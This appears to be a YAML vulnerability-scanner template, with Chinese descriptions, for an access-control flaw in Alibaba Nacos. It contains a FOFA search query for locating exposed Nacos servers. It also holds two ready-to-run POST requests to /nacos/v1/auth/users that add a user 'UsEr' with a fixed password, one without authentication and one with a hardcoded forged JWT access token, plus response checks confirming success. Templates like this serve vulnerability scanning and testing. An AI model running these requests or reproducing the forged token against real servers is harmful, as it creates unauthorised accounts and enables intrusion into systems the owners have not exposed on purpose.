product: Alibaba-Nacos
vName: Alibaba-Nacos (v1/auth/users) 任意用户添加
type: 访问控制
vID: [ ]
level: 3
vDesc: 按照官方文档配置启动,默认是不需要登录的，这样会导致配置中心对外直接暴露。
version: ''
note: 如果漏洞存在，则添加了用户:UsEr 密码:P@ssW0RcI
search:
  FOFA: title="Nacos" || icon_hash="13942501"
protocol: http
link: https://blog.csdn.net/zhanghang10/article/details/131593424
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: post
      follow: false
      path: /nacos/v1/auth/users
      dataJson:
        password: P@ssW0RcI
        username: UsEr
    verify:
      path: ''
      logic: or
      check:
        - body:
            value:
              - create user ok
            logic: and
        - body:
            value:
              - already exist
            logic: and
  - exp:
      method: post
      follow: false
      path: /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3OTA4NTg3NX0.WT8N_acMlow8KTHusMacfvr84W4osgSdtyHu9p49tvc
      dataJson:
        password: P@ssW0RcI
        username: UsEr
    verify:
      path: ''
      logic: or
      check:
        - body:
            value:
              - create user ok
            logic: and
        - body:
            value:
              - already exist
            logic: and